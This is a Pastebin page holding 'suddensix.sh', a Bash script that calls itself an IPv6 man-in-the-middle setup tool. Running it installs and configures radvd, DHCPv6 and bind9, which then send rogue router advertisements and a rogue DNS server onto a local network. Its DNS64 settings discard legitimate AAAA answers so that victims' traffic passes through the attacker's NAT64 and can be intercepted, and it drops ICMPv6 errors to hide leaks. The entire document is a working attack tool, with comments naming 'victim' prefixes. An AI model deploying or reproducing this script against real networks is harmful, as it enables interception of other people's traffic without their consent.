Advertisement
opexxx

suddensix.sh

Jun 5th, 2014
287
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 9.33 KB | None | 0 0
  1. #!/bin/bash
  2. PATH="/usr/bin:/usr/sbin:/bin:/sbin"
  3. #
  4. # IPv6 MITM Setup Script
  5. # This script will install dependencies and configure the system for IPv6 infrastructure
  6. # Written for plain Ubuntu 12.04 LTS, might work on Debian 6 or Kali with minor adjustments
  7. # Run me as root!
  8.  
  9. #GLOBALS
  10. #TAYGAINTERFACE default name for the Tayga virtual interface
  11. TAYGAINTERFACE="nat64"
  12. #DEFAULT6PREFIX default IPv6 prefix to present, we're assuming the reserved 64:FF9B::/96
  13. #If you use this as a variable you must end it appropriately by adding the necessary colons or full expansion (i.e. 64:FF9B::1)
  14. DEFAULT6PREFIX="2001:db8:1:"
  15. DEFAULT6CIDR="96"
  16. #DEFAULT64MAPPREFIX default IPv6 prefix to map the IPv4 responses into, it must be in the defined prefix. This will be added as a route to the tayga interface.
  17. TAYGA64MAPPREFIX="${DEFAULT6PREFIX}FFFF::/96"
  18. #DIP6 IPv6 address and CIDR to assign to DINTERFACE
  19. #THIS WILL ALSO BE USED/ADVERTISED AS THE DNS6 SERVER ADDRESS
  20. DIP6="${DEFAULT6PREFIX}:2" #i.e. 64:FF9B::2
  21. #Advertised SLAAC routing will also use this cidr
  22. DIP6CIDR="64"
  23. #i.e. ${DIP6}/${DIP6CIDR} = 64:FF9B::2/64
  24. #DHCPv6 range
  25. DHCPV6START="${DEFAULT6PREFIX}CAFE::10" #i.e. 64:FF9B::CAFE:10
  26. DHCPV6END="${DEFAULT6PREFIX}CAFE::0240" #i.e. 64:FF9B::CAFE:0240
  27. DHCPV6DOMAIN="localdomain6"
  28. #TAYGA6IP IPv6 address to be assigned to the tayga virtual interface for the 6-side of NATting
  29. TAYGA6IP="${DEFAULT6PREFIX}:3" #i.e. 64:FF9B::3
  30.  
  31. #TAYGA4SUBNET default IPv4 /24 subnet for tayga to NAT traffic through. This will only be used on the nat64 interface but should NOT be a network that is in use.
  32. TAYGA4SUBNET="192.168.255.0/24"
  33. #TAYGA4IP default IPv4 address for tayga virtual interface, it should be within TAYGA4SUBNET
  34. TAYGA4IP="192.168.255.1"
  35. #DINTERFACE interface to listen on, defaulted here but we'll prompt for it
  36. DINTERFACE="eth0"
  37. #DSECONDIP second "Legitimate" IPv4 address to prompt for, assuming an actual DHCPv4 lease is the first. This will be assigned to the tayga nat64 interface for NAT-ing
  38. DSECONDIP=""
  39. #NAMESERVERS existing IPv4 DNS servers, this should be replaced with the internal DNSv4 servers from DHCP
  40. #If we get a blank we'll fall back to google
  41. #BINDFORWARDERS="8.8.8.8;"
  42. DEFAULTNAMESERVERS="8.8.8.8"
  43.  
  44. ##CONFIG FILE LOCATIONS
  45. #wide-dhcpv6-server
  46. PATHDEFDHCP6CONF="/etc/default/wide-dhcpv6-server"
  47. PATHDHCP6CONF="/etc/wide-dhcpv6/dhcp6s.conf"
  48. #tayga
  49. PATHTAYGACONF="/etc/tayga.conf"
  50. #radvd
  51. PATHRADVDCONF="/etc/radvd.conf"
  52. #bind9 options
  53. PATHNAMEDOPTIONSCONF="/etc/bind/named.conf.options"
  54.  
  55. #INSTALLEDLIST list of installed Debian packages
  56. INSTALLEDLIST=""
  57.  
  58. #FUNCTIONS
  59. #Sets up the system for IPv6
  60. function loadIPv6Module {
  61.     /sbin/modprobe ipv6
  62.     # persist this with
  63.     #echo 'ipv6' >> /etc/modules
  64. }
  65. #Sets up the system for forwarding
  66. function enableForwarding {
  67.     echo 1 > /proc/sys/net/ipv4/ip_forward
  68.     echo 1 > /proc/sys/net/ipv6/conf/all/forwarding
  69.     #persist these in /etc/sysctl.conf
  70. }
  71.  
  72. #Remove all the iptables rules
  73. function clearIpTables {  
  74.     /sbin/iptables -F
  75.     /sbin/iptables -X
  76.     /sbin/ip6tables -F
  77.     /sbin/ip6tables -X
  78. }
  79. #Set up the 6-4 forwarding between your interface and the tayga virtual interface
  80. function setIpTablesForwarding {
  81.     # Set up iptables nat64
  82.     /sbin/iptables -I FORWARD -j ACCEPT -i $TAYGAINTERFACE -o $DINTERFACE
  83.     /sbin/iptables -I FORWARD -j ACCEPT -i $DINTERFACE -o $TAYGAINTERFACE -m state --state RELATED,ESTABLISHED
  84.     /sbin/iptables -t nat -I POSTROUTING -o $DINTERFACE -j MASQUERADE
  85.     #this never worked /sbin/iptables -I FORWARD  -j LOG --log-prefix "IPTables forward: "
  86.     #Drop destination unreachable messages for when we have leaks of legit ipv6 addresses, i.e. from the legit dhcpv4 server
  87.     /sbin/ip6tables -A OUTPUT -p icmpv6 --icmpv6-type 1 -j DROP
  88. }
  89. #Config file creation functions
  90. #use the EOF sentinal style for long config file
  91. # do NOT quote EOF ("EOF"), let bash expand variables here
  92.  
  93. #Creates /etc/default/wide-dhcpv6-server and /etc/wide-dhcpv6/dhcp6s.conf
  94. function setWideDhcp6Conf {
  95.     #Make active dhcpv6 on your interface (Debian)
  96.     echo "INTERFACES=${DINTERFACE}" > $PATHDEFDHCP6CONF
  97.     echo "Writing to $PATHDEFDHCP6CONF"
  98.     #Now the actual config
  99. read -d '' DHCP6CONF << EOF
  100. option domain-name-servers ${DIP6};
  101. option domain-name "${DHCPV6DOMAIN}";
  102. interface ${DINTERFACE} {
  103.     address-pool pool1 3600;
  104. };
  105. pool pool1 {
  106.     range ${DHCPV6START} to ${DHCPV6END};
  107. };
  108. EOF
  109.     echo "${DHCP6CONF}" > ${PATHDHCP6CONF}
  110.     echo "Writing to $PATHDHCP6CONF"
  111. }
  112. #Creates /etc/tayga.conf
  113. function setTaygaConf {
  114. read -d '' TAYGACONF << EOF
  115. tun-device ${TAYGAINTERFACE}
  116. ipv4-addr ${TAYGA4IP}
  117. prefix  ${TAYGA64MAPPREFIX}
  118. dynamic-pool ${TAYGA4SUBNET}
  119. EOF
  120.     echo "${TAYGACONF}" > $PATHTAYGACONF
  121.     echo "Writing to $PATHTAYGACONF"
  122. }
  123. #Creates /etc/radvd.conf
  124. function setRADvdConf {
  125. #use the EOF sentinal style for long config file
  126. read -d '' RADVDCONF << EOF
  127. interface ${DINTERFACE}
  128. {
  129.     AdvSendAdvert on;
  130.     MinRtrAdvInterval 3;
  131.     MaxRtrAdvInterval 10;
  132.     AdvHomeAgentFlag off;
  133.     #Clients should query our DHCPv6 server for other stuff (i.e. DNS) needed for Win7/Win8
  134.     AdvOtherConfigFlag on;
  135.     #desired slaac
  136.     prefix ${DEFAULT6PREFIX}:/${DIP6CIDR}
  137.     {
  138.         AdvOnLink on;
  139.         AdvAutonomous on;
  140.         AdvRouterAddr off;
  141.     };
  142.     #Advertise our IPv6 address as DNS server. This is ignored by Win7+
  143.     RDNSS ${DIP6}
  144.     {
  145.         AdvRDNSSLifetime 30;
  146.     };
  147. };
  148. EOF
  149.  
  150.     echo "${RADVDCONF}" > $PATHRADVDCONF
  151.     echo "Writing to $PATHRADVDCONF"
  152. }
  153. #Creates /etc/bind/named.conf.options
  154. function setBind9Options {
  155.     #populate BINDFORWARDERS
  156.     getNameServers
  157. read -d '' NAMEDCONF << EOF
  158. options {
  159.     directory "/var/cache/bind";
  160.     forwarders {
  161.         #The actual client DNS servers here, don't use the root fallback
  162.         #GRAB THESE FROM /etc/resolv.conf from dhcp?
  163.         ${BINDFORWARDERS}
  164.     };
  165.     dnssec-validation auto;
  166.     auth-nxdomain no;
  167.     listen-on-v6 { any; };
  168.     allow-query { any; };
  169.     #bind9 standard - compatible mapping
  170.     dns64 ${TAYGA64MAPPREFIX} {
  171.         #todo lock this down to just our victim ipv6 prefixes
  172.         clients { any; };
  173.         #Disregard all legit AAAA responses, always return our prefixed A responses for AAAA
  174.         exclude { any; };
  175.     };
  176. };
  177. EOF
  178.     echo "${NAMEDCONF}" > ${PATHNAMEDOPTIONSCONF}
  179.     echo "Writing to ${PATHNAMEDOPTIONSCONF}"
  180. }
  181. #extracts nameservers from /etc/resolv.conf
  182. function getNameServers {
  183.     if [ -e "/etc/resolv.conf" ]; then
  184.         local NAMESERVERS=`/bin/grep '^nameserver' /etc/resolv.conf | /usr/bin/awk '{print $2}'`
  185.         if [ -z "$NAMESERVERS" ] ; then
  186.             NAMESERVERS="$DEFAULTNAMESERVERS"
  187.         fi
  188.         #suffix the values with a semicolon for named.conf
  189.         for server in $NAMESERVERS; do
  190.             BINDFORWARDERS+="${server};"
  191.             BINDFORWARDERS+=$'\n'
  192.         done
  193.     fi
  194. }
  195. #Get list of installed packages for checking
  196. function getInstalledDpkg {
  197.     INSTALLEDLIST=`/usr/bin/dpkg --get-selections | grep install | awk '{print $1}'`
  198. }
  199. #Find out if a package is installed, takes a string argument for package name
  200. #Returns true or false (commands /bin/true /bin/false)
  201. function isPkgInstalled {
  202.     search_str="$1"
  203.     case "$INSTALLEDLIST" in
  204.        *"$search_str"* ) true;;
  205.        * ) echo false;;
  206.     esac
  207. }
  208. #Install packages, these should all be in the standard Ubuntu repos
  209. function installPrereqDpkgs {
  210.     /usr/bin/apt-get install -y sipcalc tayga radvd wide-dhcpv6-server bind9 iptables
  211. }
  212. #Set up Taya interface, IP addresses and routes, and and start Tayga
  213. function startTayga {
  214.     # Set up interfaces
  215.     ip addr add "${DIP6}/${DIP6CIDR}" dev $DINTERFACE
  216.     #makes nat64 interface according to tayga.conf
  217.     /usr/sbin/tayga --mktun
  218.     ip link set $TAYGAINTERFACE up
  219.    
  220.     ip addr add $DSECONDIP dev $TAYGAINTERFACE
  221.     ip addr add $TAYGA4IP dev $TAYGAINTERFACE
  222.     ip route add $TAYGA4SUBNET dev $TAYGAINTERFACE
  223.  
  224.     ip addr add $TAYGA6IP dev $TAYGAINTERFACE
  225.     ip route add $TAYGA64MAPPREFIX dev $TAYGAINTERFACE
  226.     #Now run tayga as a daemon
  227.     /usr/sbin/tayga && ( echo "tayga should now be running as a daemon"; return 0 )
  228. }
  229. function stopTayga {
  230.     ip link set $TAYGAINTERFACE down
  231.     /usr/sbin/tayga --rmtun
  232. }
  233.  
  234. #EXECUTION
  235.  
  236. /bin/ping6 -c 3 google.com && ( echo "I am able to IPv6 ping google.com already, bailing out."; exit )
  237.  
  238.  
  239. #Kind of mindless for now just install the packages we need first
  240. echo "Welcome, I'll install a few packages and ask a couple of questions first"
  241. installPrereqDpkgs
  242. # Prompt for network interface to use
  243. read -p "Please enter the interface name to listen on (default ${DINTERFACE}): " DINTERFACE
  244. echo "This is your current address information: "
  245. sipcalc $DINTERFACE
  246. # Prompt for second IP on the subnet
  247. read -p "Please enter an additional available IPv4 address in this range: " DSECONDIP
  248. #Configure these system parameters in a non-persistent way for now
  249. loadIPv6Module
  250. enableForwarding
  251.  
  252. clearIpTables
  253. stopTayga
  254.  
  255. setBind9Options
  256. setRADvdConf
  257. setWideDhcp6Conf
  258. setTaygaConf
  259. #Most of the non-persistent configuration is in startTayga
  260. if startTayga; then
  261.     sleep 5
  262.     #Restart our daemons they need to know our addresses
  263.     #TODO: check if we need to enable them
  264.     service radvd stop
  265.     sleep 3
  266.     service radvd start
  267.     service bind9 restart
  268.     service wide-dhcpv6-server restart
  269.     #More non-persistent configuration
  270.     setIpTablesForwarding
  271.  
  272.     echo "I'm ready."
  273. else
  274.     echo "Failed to start NAT64"
  275. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement